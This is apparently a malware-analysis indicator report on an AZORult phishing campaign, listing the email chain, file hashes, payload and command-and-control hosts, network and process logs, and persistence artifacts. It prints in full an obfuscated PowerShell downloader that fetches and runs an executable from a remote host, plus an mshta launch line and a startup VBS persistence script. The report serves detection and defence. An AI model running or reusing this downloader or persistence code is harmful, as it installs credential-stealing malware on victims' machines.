#azorult_080419

1. #IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell
2.  
3. https://pastebin.com/0bX17LaY
4.  
5. previous_contact:
6. --------------
7. 17/09/18 https://pastebin.com/MwwZ7DyY
8.  
9. FAQ:
10. https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/
11.  
12. attack_vector
13. --------------
14. email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe
15.  
16. email_headers
17. --------------
18. Received: from jyotiimpex.co.in ([157.230.191.189])
19. by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
20. Reply-To: yakupabaci@ulasvana.com
21. From: Biju Kurian <admin@jyotiimpex.co.in>
22. To: user00@org88.victim0.com
23. Subject: Attached proposal #506697
24. Date: 08 Apr 2019 10:45:51 -0700
25.  
26. files
27. --------------
28. SHA-256 71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
29. File name 506697.gif.zip [Zip archive data, at least v2.0 to extract]
30. File size 624 B (624 bytes)
31.  
32. SHA-256 67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
33. File name 506697.gif.lnk [MS Windows shortcut, window=hidenormalshowminimized]
34. File size 1.65 KB (1686 bytes)
35.  
36. SHA-256 f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
37. File name out-761452637.hta [HTML document, ASCII text, with very long lines]
38. File size 4.28 KB (4387 bytes)
39.  
40. SHA-256 3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
41. File name 506697.gif [PE32 executable (GUI) Intel 80386, for MS Windows]
42. File size 674 KB (690176 bytes)
43.  
44. activity
45. **************
46.  
47. PL_SRC:
48.  
49. gingerandcoblog{.} com/test/wp/out-761452637.hta [1st, initiate]
50.  
51. gingerandcoblog{.} com/test/wp/506697.gif [2nd, main file]
52.  
53. C2:
54.  
55. cubaworts{.} gq//700/index.php
56.  
57. Powershell
58. "
59. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
60. "
61.  
62. netwrk
63. --------------
64. 67.225.197.20 gingerandcoblog{.} com GET /test/wp/out-761452637.hta HTTP/1.1 Mozilla/4.0
65. 67.225.197.20 gingerandcoblog{.} com GET /test/wp/506697.gif HTTP/1.1 No User Agent [!..This program must be run under Win32]
66. 51.89.0.140 cubaworts{.} gq POST /700/index.php HTTP/1.1 Mozilla/4.0
67.  
68. comp
69. --------------
70. mshta.exe 3428 TCP localhost 50097 67.225.197.20 80 SYN_SENT
71. mshta.exe 3428 TCP localhost 50098 67.225.197.20 80 ESTABLISHED
72. powershell.exe 3244 TCP localhost 50099 67.225.197.20 80 ESTABLISHED
73. [System] 0 TCP localhost 50100 51.89.0.140 80 TIME_WAIT
74.  
75. proc
76. --------------
77. "C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
78. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...
79.  
80. C:\Users\Public\qkn.exe
81. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
82. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
83.  
84. "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
85. C:\Windows\system32\timeout.exe 3
86.  
87. persist
88. --------------
89. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 29.03.2019 11:03
90. 0mbii.vbs
91. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs 29.03.2019 11:03
92.  
93. 0mbii.vbs
94. - - - - -
95. "
96. SEt wdd = CreateObjEcT("wScRipt.shelL")
97. WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
98. "
99.  
100. drop
101. --------------
102. C:\Users\Public\qkn.exe
103. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
104. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs
105.  
106. # # #
107. https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
108. https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
109. https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
110. https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
111. https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d
112.  
113. VR